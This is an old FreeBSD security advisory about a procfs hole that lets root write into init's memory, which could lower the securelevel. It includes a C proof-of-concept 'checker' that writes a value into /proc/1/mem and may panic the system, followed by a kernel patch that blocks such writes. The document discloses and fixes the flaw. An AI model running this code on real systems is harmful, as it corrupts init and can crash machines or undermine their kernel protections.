9th Sep 1997 [SBWID-186]
COMMAND
procfs
SYSTEMS AFFECTED
FreeBSD
PROBLEM
Brian Mitchell posted following. There is a slight procfs hole
that could allow a intruder to lower the securelevel. init's
memory is not protected, so you can overwrite data/instructions
in init and possibly lower the securelevel (although panicing the
system is much more likely). Enclosed is a vulnerbility checker:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <fcntl.h>
main()
{
int tqbf=31337;
int fd;
int g0nz0;
if(getuid())
{
fprintf(stderr, "this attack needs root\n");
exit(1);
}
fd = open("/proc/1/mem", O_RDWR);
if(fd < 0)
{
fprintf(stderr, "open of /proc/1/mem failed\n");
exit(2);
}
lseek(fd, 0x1000, SEEK_SET);
g0nz0=write(fd, &tqbf, sizeof(int));
close(fd);
if(g0nz0 >= 0)
fprintf(stderr, "procfs is vulnerable!\n");
else
fprintf(stderr, "procfs is not vulnerable!\n");
printf("returned %d\n", g0nz0);
}
SOLUTION
Here is a simple patch, it disallows writes to pid 1's mem node if
securelevel is > 0 (diff is based on 2.2.1 box with the
securelevel fix applied):
*** procfs_mem.c Sat Sep 6 02:36:39 1997
--- procfs_mem.c.new Sat Sep 6 02:38:25 1997
***************
*** 316,321 ****
--- 316,325 ----
!(curp->p_cred->pc_ucred->cr_gid == KMEM_GROUP &&
uio->uio_rw == UIO_READ))
return EPERM;
+
+ /* writing to init memory while securelevel > 0 is bad */
+ if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0)
+ return EPERM;
error = procfs_rwmem(p, uio);